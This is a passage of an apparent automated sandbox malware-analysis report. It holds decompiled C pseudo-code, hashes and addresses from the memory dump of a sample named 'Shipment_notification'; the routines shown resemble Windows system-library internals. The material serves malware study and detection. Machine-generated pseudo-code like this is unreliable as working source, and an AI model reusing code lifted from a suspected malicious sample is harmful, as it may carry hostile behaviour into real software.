                                                                                							L12:
                                                                                							_t21 = _t90 + 4; // 0x7709c21e
                                                                                							_t87 =  *_t21;
                                                                                							_v6 = 0;
                                                                                							if(_t79 != 0) {
                                                                                								if((_t87 & 0x00000002) != 0) {
                                                                                									goto L19;
                                                                                								}
                                                                                								if((_t87 & 0x00000001) != 0) {
                                                                                									_v6 = 1;
                                                                                									_t74 = _t87 ^ 0x00000003;
                                                                                								} else {
                                                                                									_t51 = _t87 - 2; // -2
                                                                                									_t74 = _t51;
                                                                                								}
                                                                                								goto L15;
                                                                                							} else {
                                                                                								if((_t87 & 0x00000001) != 0) {
                                                                                									_v6 = 1;
                                                                                									_t74 = _t87 ^ 0x00000001;
                                                                                								} else {
                                                                                									_t26 = _t87 - 4; // -4
                                                                                									_t74 = _t26;
                                                                                									if((_t74 & 0x00000002) == 0) {
                                                                                										_t74 = _t74 - 2;
                                                                                									}
                                                                                								}
                                                                                								L15:
                                                                                								if(_t74 == _t87) {
                                                                                									L19:
                                                                                									E01AE2D8A(_t74, _t90, _t87, _t90);
                                                                                									_t74 = _v12;
                                                                                									_v8 = 1;
                                                                                									if(_v7 != 0 && _t74 > 0x64) {
                                                                                										_t74 = _t74 - 1;
                                                                                										_v12 = _t74;
                                                                                									}
                                                                                									_t79 = _v5;
                                                                                									goto L4;
                                                                                								}
                                                                                								asm("lock cmpxchg [esi], ecx");
                                                                                								if(_t87 != _t87) {
                                                                                									_t74 = _v12;
                                                                                									_t59 = 0;
                                                                                									_t79 = _v5;
                                                                                									continue;
                                                                                								}
                                                                                								if(_v6 != 0) {
                                                                                									_t74 = _v12;
                                                                                									L25:
                                                                                									if(_v7 != 0) {
                                                                                										if(_t74 < 0x7d0) {
                                                                                											if(_v8 == 0) {
                                                                                												_t74 = _t74 + 1;
                                                                                											}
                                                                                										}
                                                                                										_t38 = _t90 + 0x14; // 0x0
                                                                                										_t39 = _t90 + 0x14; // 0x0
                                                                                										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
                                                                                										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
                                                                                											_t85 = _t85 & 0xff000000;
                                                                                										}
                                                                                										 *(_t90 + 0x14) = _t85;
                                                                                									}
                                                                                									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                                                									 *((intOrPtr*)(_t90 + 8)) = 1;
                                                                                									return 0;
                                                                                								}
                                                                                								_v5 = 1;
                                                                                								_t87 = _t74;
                                                                                								goto L19;
                                                                                							}
                                                                                						}
                                                                                						_t94 = _t74;
                                                                                						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
                                                                                						if(_t74 == 0) {
                                                                                							goto L12;
                                                                                						} else {
                                                                                							_t91 = _t90 + 4;
                                                                                							goto L8;
                                                                                							L9:
                                                                                							while((_t81 & 0x00000001) != 0) {
                                                                                								_t69 = _t81;
                                                                                								asm("lock cmpxchg [edi], edx");
                                                                                								if(_t69 != _t81) {
                                                                                									_t81 = _t69;
                                                                                									continue;
                                                                                								}
                                                                                								_t90 = _v16;
                                                                                								goto L25;
                                                                                							}
                                                                                							asm("pause");
                                                                                							_t94 = _t94 - 1;
                                                                                							if(_t94 != 0) {
                                                                                								L8:
                                                                                								_t81 =  *_t91;
                                                                                								goto L9;
                                                                                							} else {
                                                                                								_t90 = _v16;
                                                                                								_t79 = _v5;
                                                                                								goto L12;
                                                                                							}
                                                                                						}
                                                                                					}
                                                                                				}
                                                                                			}

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                                                • Instruction ID: 71d57ef3e42c6928960bc4ac14ccfc5d4621d2f59553d1aab8e29a1d1d121ddc
                                                                                • Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                                                • Instruction Fuzzy Hash: 20510431A04245DFEB25CBACC1C07AEFBB1EF05324F1881ACE74593282D375A989C741
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 84%
                                                                                			E01BB740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
                                                                                				signed short* _v8;
                                                                                				intOrPtr _v12;
                                                                                				intOrPtr _t55;
                                                                                				void* _t56;
                                                                                				intOrPtr* _t66;
                                                                                				intOrPtr* _t69;
                                                                                				void* _t74;
                                                                                				intOrPtr* _t78;
                                                                                				intOrPtr* _t81;
                                                                                				intOrPtr* _t82;
                                                                                				intOrPtr _t83;
                                                                                				signed short* _t84;
                                                                                				intOrPtr _t85;
                                                                                				signed int _t87;
                                                                                				intOrPtr* _t90;
                                                                                				intOrPtr* _t93;
                                                                                				intOrPtr* _t94;
                                                                                				void* _t98;
                                                                                
                                                                                				_t84 = __edx;
                                                                                				_t80 = __ecx;
                                                                                				_push(__ecx);
                                                                                				_push(__ecx);
                                                                                				_t55 = __ecx;
                                                                                				_v8 = __edx;
                                                                                				_t87 =  *__edx & 0x0000ffff;
                                                                                				_v12 = __ecx;
                                                                                				_t3 = _t55 + 0x154; // 0x154
                                                                                				_t93 = _t3;
                                                                                				_t78 =  *_t93;
                                                                                				_t4 = _t87 + 2; // 0x2
                                                                                				_t56 = _t4;
                                                                                				while(_t78 != _t93) {
                                                                                					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
                                                                                						L4:
                                                                                						_t78 =  *_t78;
                                                                                						continue;
                                                                                					} else {
                                                                                						_t7 = _t78 + 0x18; // 0x18
                                                                                						if(E01B3D4F0(_t7, _t84[2], _t87) == _t87) {
                                                                                							_t40 = _t78 + 0xc; // 0xc
                                                                                							_t94 = _t40;
                                                                                							_t90 =  *_t94;
                                                                                							while(_t90 != _t94) {
                                                                                								_t41 = _t90 + 8; // 0x8
                                                                                								_t74 = E01B2F380(_a4, _t41, 0x10);
                                                                                								_t98 = _t98 + 0xc;
                                                                                								if(_t74 != 0) {
                                                                                									_t90 =  *_t90;
                                                                                									continue;
                                                                                								}
                                                                                								goto L12;
                                                                                							}
                                                                                							_t82 = L01B04620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
                                                                                							if(_t82 != 0) {
                                                                                								_t46 = _t78 + 0xc; // 0xc
                                                                                								_t69 = _t46;
                                                                                								asm("movsd");
                                                                                								asm("movsd");
                                                                                								asm("movsd");
                                                                                								asm("movsd");
                                                                                								_t85 =  *_t69;
                                                                                								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
                                                                                									L20:
                                                                                									_t82 = 3;
                                                                                									asm("int 0x29");
                                                                                								}
                                                                                								 *((intOrPtr*)(_t82 + 4)) = _t69;
                                                                                								 *_t82 = _t85;
                                                                                								 *((intOrPtr*)(_t85 + 4)) = _t82;
                                                                                								 *_t69 = _t82;
                                                                                								 *(_t78 + 8) =  *(_t78 + 8) + 1;
                                                                                								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
                                                                                								goto L11;
                                                                                							} else {
                                                                                								L18:
                                                                                								_push(0xe);
                                                                                								_pop(0);
                                                                                							}
                                                                                						} else {
                                                                                							_t84 = _v8;
                                                                                							_t9 = _t87 + 2; // 0x2
                                                                                							_t56 = _t9;
                                                                                							goto L4;
                                                                                						}
                                                                                					}
                                                                                					L12:
                                                                                					return 0;
                                                                                				}
                                                                                				_t10 = _t87 + 0x1a; // 0x1a
                                                                                				_t78 = L01B04620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
                                                                                				if(_t78 == 0) {
                                                                                					goto L18;
                                                                                				} else {
                                                                                					_t12 = _t87 + 2; // 0x2
                                                                                					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
                                                                                					_t16 = _t78 + 0x18; // 0x18
                                                                                					E01B2F3E0(_t16, _v8[2], _t87);
                                                                                					 *((short*)(_t78 + _t87 + 0x18)) = 0;
                                                                                					_t19 = _t78 + 0xc; // 0xc
                                                                                					_t66 = _t19;
                                                                                					 *((intOrPtr*)(_t66 + 4)) = _t66;
                                                                                					 *_t66 = _t66;
                                                                                					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
                                                                                					_t81 = L01B04620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
                                                                                					if(_t81 == 0) {
                                                                                						goto L18;
                                                                                					} else {
                                                                                						_t26 = _t78 + 0xc; // 0xc
                                                                                						_t69 = _t26;
                                                                                						asm("movsd");
                                                                                						asm("movsd");
                                                                                						asm("movsd");
                                                                                						asm("movsd");
                                                                                						_t85 =  *_t69;
                                                                                						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
                                                                                							goto L20;
                                                                                						} else {
                                                                                							 *((intOrPtr*)(_t81 + 4)) = _t69;
                                                                                							 *_t81 = _t85;
                                                                                							 *((intOrPtr*)(_t85 + 4)) = _t81;
                                                                                							 *_t69 = _t81;
                                                                                							_t83 = _v12;
                                                                                							 *(_t78 + 8) = 1;
                                                                                							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
                                                                                							_t34 = _t83 + 0x154; // 0x1ba
                                                                                							_t69 = _t34;
                                                                                							_t85 =  *_t69;
                                                                                							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
                                                                                								goto L20;
                                                                                							} else {
                                                                                								 *_t78 = _t85;
                                                                                								 *((intOrPtr*)(_t78 + 4)) = _t69;
                                                                                								 *((intOrPtr*)(_t85 + 4)) = _t78;
                                                                                								 *_t69 = _t78;
                                                                                								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
                                                                                							}
                                                                                						}
                                                                                						goto L11;
                                                                                					}
                                                                                				}
                                                                                				goto L12;
                                                                                			}






















                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 97%
                                                                                			E01B12990() {
                                                                                				signed int* _t62;
                                                                                				signed int _t64;
                                                                                				intOrPtr _t66;
                                                                                				signed short* _t69;
                                                                                				intOrPtr _t76;
                                                                                				signed short* _t79;
                                                                                				void* _t81;
                                                                                				signed int _t82;
                                                                                				signed short* _t83;
                                                                                				signed int _t87;
                                                                                				intOrPtr _t91;
                                                                                				void* _t98;
                                                                                				signed int _t99;
                                                                                				void* _t101;
                                                                                				signed int* _t102;
                                                                                				void* _t103;
                                                                                				void* _t104;
                                                                                				void* _t107;
                                                                                
                                                                                				_push(0x20);
                                                                                				_push(0x1bbff00);
                                                                                				E01B3D08C(_t81, _t98, _t101);
                                                                                				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
                                                                                				_t99 = 0;
                                                                                				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
                                                                                				_t82 =  *((intOrPtr*)(_t103 + 0x10));
                                                                                				if(_t82 == 0) {
                                                                                					_t62 = 0xc0000100;
                                                                                				} else {
                                                                                					 *((intOrPtr*)(_t103 - 4)) = 0;
                                                                                					_t102 = 0xc0000100;
                                                                                					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
                                                                                					_t64 = 4;
                                                                                					while(1) {
                                                                                						 *(_t103 - 0x24) = _t64;
                                                                                						if(_t64 == 0) {
                                                                                							break;
                                                                                						}
                                                                                						_t87 = _t64 * 0xc;
                                                                                						 *(_t103 - 0x2c) = _t87;
                                                                                						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0x1ac1664));
                                                                                						if(_t107 <= 0) {
                                                                                							if(_t107 == 0) {
                                                                                								_t79 = E01B2E5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0x1ac1668)), _t82);
                                                                                								_t104 = _t104 + 0xc;
                                                                                								__eflags = _t79;
                                                                                								if(__eflags == 0) {
                                                                                									_t102 = E01B651BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0x1ac166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
                                                                                									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
                                                                                									break;
                                                                                								} else {
                                                                                									_t64 =  *(_t103 - 0x24);
                                                                                									goto L5;
                                                                                								}
                                                                                								goto L13;
                                                                                							} else {
                                                                                								L5:
                                                                                								_t64 = _t64 - 1;
                                                                                								continue;
                                                                                							}
                                                                                						}
                                                                                						break;
                                                                                					}
                                                                                					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
                                                                                					__eflags = _t102;
                                                                                					if(_t102 < 0) {
                                                                                						__eflags = _t102 - 0xc0000100;
                                                                                						if(_t102 == 0xc0000100) {
                                                                                							_t83 =  *((intOrPtr*)(_t103 + 8));
                                                                                							__eflags = _t83;
                                                                                							if(_t83 != 0) {
                                                                                								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
                                                                                								__eflags =  *_t83 - _t99;
                                                                                								if( *_t83 == _t99) {
                                                                                									_t102 = 0xc0000100;
                                                                                									goto L19;
                                                                                								} else {
                                                                                									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
                                                                                									_t66 =  *((intOrPtr*)(_t91 + 0x10));
                                                                                									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
                                                                                									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
                                                                                										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
                                                                                										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
                                                                                											L26:
                                                                                											_t102 = E01B12AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
                                                                                											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
                                                                                											__eflags = _t102 - 0xc0000100;
                                                                                											if(_t102 != 0xc0000100) {
                                                                                												goto L12;
                                                                                											} else {
                                                                                												_t99 = 1;
                                                                                												_t83 =  *((intOrPtr*)(_t103 - 0x20));
                                                                                												goto L18;
                                                                                											}
                                                                                										} else {
                                                                                											_t69 = L01AF6600( *((intOrPtr*)(_t91 + 0x1c)));
                                                                                											__eflags = _t69;
                                                                                											if(_t69 != 0) {
                                                                                												goto L26;
                                                                                											} else {
                                                                                												_t83 =  *((intOrPtr*)(_t103 + 8));
                                                                                												goto L18;
                                                                                											}
                                                                                										}
                                                                                									} else {
                                                                                										L18:
                                                                                										_t102 = E01B12C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
                                                                                										L19:
                                                                                										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
                                                                                										goto L12;
                                                                                									}
                                                                                								}
                                                                                								L28:
                                                                                							} else {
                                                                                								E01AFEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                                                								 *((intOrPtr*)(_t103 - 4)) = 1;
                                                                                								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
                                                                                								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
                                                                                								_t76 = E01B12AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
                                                                                								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
                                                                                								__eflags = _t76 - 0xc0000100;
                                                                                								if(_t76 == 0xc0000100) {
                                                                                									 *((intOrPtr*)(_t103 - 0x1c)) = E01B12C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
                                                                                								}
                                                                                								 *((intOrPtr*)(_t103 - 4)) = _t99;
                                                                                								E01B12ACB();
                                                                                							}
                                                                                						}
                                                                                					}
                                                                                					L12:
                                                                                					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
                                                                                					_t62 = _t102;
                                                                                				}
                                                                                				L13:
                                                                                				return E01B3D0D1(_t62);
                                                                                				goto L28;
                                                                                			}





















                                                                                0x01b129e9
                                                                                0x01b129eb
                                                                                0x01b129ed
                                                                                0x01b129f3
                                                                                0x01b129f5
                                                                                0x01b129f8
                                                                                0x01b129fa
                                                                                0x01b12a97
                                                                                0x01b12a9a
                                                                                0x01b12a9d
                                                                                0x01b12add
                                                                                0x00000000
                                                                                0x01b12a9f
                                                                                0x01b12aa2
                                                                                0x01b12aa5
                                                                                0x01b12aa8
                                                                                0x01b12aab
                                                                                0x01b55cab
                                                                                0x01b55caf
                                                                                0x01b55cc5
                                                                                0x01b55cda
                                                                                0x01b55cdc
                                                                                0x01b55cdf
                                                                                0x01b55ce5
                                                                                0x00000000
                                                                                0x01b55ceb
                                                                                0x01b55ced
                                                                                0x01b55cee
                                                                                0x00000000
                                                                                0x01b55cee
                                                                                0x01b55cb1
                                                                                0x01b55cb4
                                                                                0x01b55cb9
                                                                                0x01b55cbb
                                                                                0x00000000
                                                                                0x01b55cbd
                                                                                0x01b55cbd
                                                                                0x00000000
                                                                                0x01b55cbd
                                                                                0x01b55cbb
                                                                                0x01b12ab1
                                                                                0x01b12ab1
                                                                                0x01b12ac4
                                                                                0x01b12ac6
                                                                                0x01b12ac6
                                                                                0x00000000
                                                                                0x01b12ac6
                                                                                0x01b12aab
                                                                                0x00000000
                                                                                0x01b12a00
                                                                                0x01b12a09
                                                                                0x01b12a0e
                                                                                0x01b12a21
                                                                                0x01b12a24
                                                                                0x01b12a35
                                                                                0x01b12a3a
                                                                                0x01b12a3d
                                                                                0x01b12a42
                                                                                0x01b12a59
                                                                                0x01b12a59
                                                                                0x01b12a5c
                                                                                0x01b12a5f
                                                                                0x01b12a5f
                                                                                0x01b129fa
                                                                                0x01b129f3
                                                                                0x01b12a64
                                                                                0x01b12a64
                                                                                0x01b12a6b
                                                                                0x01b12a6b
                                                                                0x01b12a6d
                                                                                0x01b12a72
                                                                                0x00000000

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: b28c85a7d517b6b21d7f996b67c9a2ba6fb300d41efd12cb67489df94b03eed1
                                                                                • Instruction ID: ecb6f290d573bca6e20640698306bc7583b691e739c2e5b49a22464bebae0a84
                                                                                • Opcode Fuzzy Hash: b28c85a7d517b6b21d7f996b67c9a2ba6fb300d41efd12cb67489df94b03eed1
                                                                                • Instruction Fuzzy Hash: E4517F72A0020ADFDF29DF59C840ADEBBB6FF48350F6681E5E914A7224C3359952CF90
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 78%
                                                                                			E01B14D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                                                                				signed int _v12;
                                                                                				char _v176;
                                                                                				char _v177;
                                                                                				char _v184;
                                                                                				intOrPtr _v192;
                                                                                				intOrPtr _v196;
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				signed short _t42;
                                                                                				char* _t44;
                                                                                				intOrPtr _t46;
                                                                                				intOrPtr _t50;
                                                                                				char* _t57;
                                                                                				intOrPtr _t59;
                                                                                				intOrPtr _t67;
                                                                                				signed int _t69;
                                                                                
                                                                                				_t64 = __edx;
                                                                                				_v12 =  *0x1bdd360 ^ _t69;
                                                                                				_t65 = 0xa0;
                                                                                				_v196 = __edx;
                                                                                				_v177 = 0;
                                                                                				_t67 = __ecx;
                                                                                				_v192 = __ecx;
                                                                                				E01B2FA60( &_v176, 0, 0xa0);
                                                                                				_t57 =  &_v176;
                                                                                				_t59 = 0xa0;
                                                                                				if( *0x1bd7bc8 != 0) {
                                                                                					L3:
                                                                                					while(1) {
                                                                                						asm("movsd");
                                                                                						asm("movsd");
                                                                                						asm("movsd");
                                                                                						asm("movsd");
                                                                                						_t67 = _v192;
                                                                                						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
                                                                                						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
                                                                                						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
                                                                                						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
                                                                                						_push( &_v184);
                                                                                						_push(_t59);
                                                                                						_push(_t57);
                                                                                						_push(0xa0);
                                                                                						_push(_t57);
                                                                                						_push(0xf);
                                                                                						_t42 = E01B2B0B0();
                                                                                						if(_t42 != 0xc0000023) {
                                                                                							break;
                                                                                						}
                                                                                						if(_v177 != 0) {
                                                                                							L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
                                                                                						}
                                                                                						_v177 = 1;
                                                                                						_t44 = L01B04620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
                                                                                						_t59 = _v184;
                                                                                						_t57 = _t44;
                                                                                						if(_t57 != 0) {
                                                                                							continue;
                                                                                						} else {
                                                                                							_t42 = 0xc0000017;
                                                                                							break;
                                                                                						}
                                                                                					}
                                                                                					if(_t42 != 0) {
                                                                                						_t65 = E01AECCC0(_t42);
                                                                                						if(_t65 != 0) {
                                                                                							L10:
                                                                                							if(_v177 != 0) {
                                                                                								if(_t57 != 0) {
                                                                                									L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
                                                                                								}
                                                                                							}
                                                                                							_t46 = _t65;
                                                                                							L12:
                                                                                							return L01B2B640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
                                                                                						}
                                                                                						L7:
                                                                                						_t50 = _a4;
                                                                                						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
                                                                                						if(_t50 != 3) {
                                                                                							if(_t50 == 2) {
                                                                                								goto L8;
                                                                                							}
                                                                                							L9:
                                                                                							if(E01B2F380(_t67 + 0xc, 0x1ac5138, 0x10) == 0) {
                                                                                								 *0x1bd60d8 = _t67;
                                                                                							}
                                                                                							goto L10;
                                                                                						}
                                                                                						L8:
                                                                                						_t64 = _t57 + 0x28;
                                                                                						E01B14F49(_t67, _t57 + 0x28);
                                                                                						goto L9;
                                                                                					}
                                                                                					_t65 = 0;
                                                                                					goto L7;
                                                                                				}
                                                                                				if(L01B14E70(0x1bd86b0, 0x1b15690, 0, 0) != 0) {
                                                                                					_t46 = E01AECCC0(_t56);
                                                                                					goto L12;
                                                                                				} else {
                                                                                					_t59 = 0xa0;
                                                                                					goto L3;
                                                                                				}
                                                                                			}

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 6d0bc53e62d0433210d7d274bb862bda0f9338ac4961cc57d26e0ef6994f817c
                                                                                • Instruction ID: 1a40e17786650819b7a04f1badaabb7cac6dc2543d3b82c101442258405d3d66
                                                                                • Opcode Fuzzy Hash: 6d0bc53e62d0433210d7d274bb862bda0f9338ac4961cc57d26e0ef6994f817c
                                                                                • Instruction Fuzzy Hash: D341C171A403189FEB3A9F18CC80F66B7A9EB45710F4100D9E9499B285DB70DD44CB91
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 85%
                                                                                			E01B14BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
                                                                                				signed int _v8;
                                                                                				short _v20;
                                                                                				intOrPtr _v24;
                                                                                				intOrPtr _v28;
                                                                                				intOrPtr _v32;
                                                                                				char _v36;
                                                                                				char _v156;
                                                                                				short _v158;
                                                                                				intOrPtr _v160;
                                                                                				char _v164;
                                                                                				intOrPtr _v168;
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				signed int _t45;
                                                                                				intOrPtr _t74;
                                                                                				signed char _t77;
                                                                                				intOrPtr _t84;
                                                                                				char* _t85;
                                                                                				void* _t86;
                                                                                				intOrPtr _t87;
                                                                                				signed short _t88;
                                                                                				signed int _t89;
                                                                                
                                                                                				_t83 = __edx;
                                                                                				_v8 =  *0x1bdd360 ^ _t89;
                                                                                				_t45 = _a8 & 0x0000ffff;
                                                                                				_v158 = __edx;
                                                                                				_v168 = __ecx;
                                                                                				if(_t45 == 0) {
                                                                                					L22:
                                                                                					_t86 = 6;
                                                                                					L12:
                                                                                					E01AECC50(_t86);
                                                                                					L11:
                                                                                					return L01B2B640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
                                                                                				}
                                                                                				_t77 = _a4;
                                                                                				if((_t77 & 0x00000001) != 0) {
                                                                                					goto L22;
                                                                                				}
                                                                                				_t8 = _t77 + 0x34; // 0xdce0ba00
                                                                                				if(_t45 !=  *_t8) {
                                                                                					goto L22;
                                                                                				}
                                                                                				_t9 = _t77 + 0x24; // 0x1bd8504
                                                                                				E01B02280(_t9, _t9);
                                                                                				_t87 = 0x78;
                                                                                				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
                                                                                				E01B2FA60( &_v156, 0, _t87);
                                                                                				_t13 = _t77 + 0x30; // 0x3db8
                                                                                				_t85 =  &_v156;
                                                                                				_v36 =  *_t13;
                                                                                				_v28 = _v168;
                                                                                				_v32 = 0;
                                                                                				_v24 = 0;
                                                                                				_v20 = _v158;
                                                                                				_v160 = 0;
                                                                                				while(1) {
                                                                                					_push( &_v164);
                                                                                					_push(_t87);
                                                                                					_push(_t85);
                                                                                					_push(0x18);
                                                                                					_push( &_v36);
                                                                                					_push(0x1e);
                                                                                					_t88 = E01B2B0B0();
                                                                                					if(_t88 != 0xc0000023) {
                                                                                						break;
                                                                                					}
                                                                                					if(_t85 !=  &_v156) {
                                                                                						L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
                                                                                					}
                                                                                					_t84 = L01B04620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
                                                                                					_v168 = _v164;
                                                                                					if(_t84 == 0) {
                                                                                						_t88 = 0xc0000017;
                                                                                						goto L19;
                                                                                					} else {
                                                                                						_t74 = _v160 + 1;
                                                                                						_v160 = _t74;
                                                                                						if(_t74 >= 0x10) {
                                                                                							L19:
                                                                                							_t86 = E01AECCC0(_t88);
                                                                                							if(_t86 != 0) {
                                                                                								L8:
                                                                                								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
                                                                                								_t30 = _t77 + 0x24; // 0x1bd8504
                                                                                								E01AFFFB0(_t77, _t84, _t30);
                                                                                								if(_t84 != 0 && _t84 !=  &_v156) {
                                                                                									L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
                                                                                								}
                                                                                								if(_t86 != 0) {
                                                                                									goto L12;
                                                                                								} else {
                                                                                									goto L11;
                                                                                								}
                                                                                							}
                                                                                							L6:
                                                                                							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
                                                                                							if(_v164 != 0) {
                                                                                								_t83 = _t84;
                                                                                								E01B14F49(_t77, _t84);
                                                                                							}
                                                                                							goto L8;
                                                                                						}
                                                                                						_t87 = _v168;
                                                                                						continue;
                                                                                					}
                                                                                				}
                                                                                				if(_t88 != 0) {
                                                                                					goto L19;
                                                                                				}
                                                                                				goto L6;
                                                                                			}


                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: a2d6a4b4d8dd4d359e4ca786b22ea5f2dead91d517e8de8dfab89614e0dc2e35
                                                                                • Instruction ID: 88b4d57a053bba6591e85f7f3de97ddd653e43fca840353b16e133ed50dec139
                                                                                • Opcode Fuzzy Hash: a2d6a4b4d8dd4d359e4ca786b22ea5f2dead91d517e8de8dfab89614e0dc2e35
                                                                                • Instruction Fuzzy Hash: B741A235A002299BDF69DF68C940FEAB7B4EF45750F4100E9ED08AB245EB74DE84CB91
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 94%
                                                                                			E01AF8A0A(intOrPtr* __ecx, signed int __edx) {
                                                                                				signed int _v8;
                                                                                				char _v524;
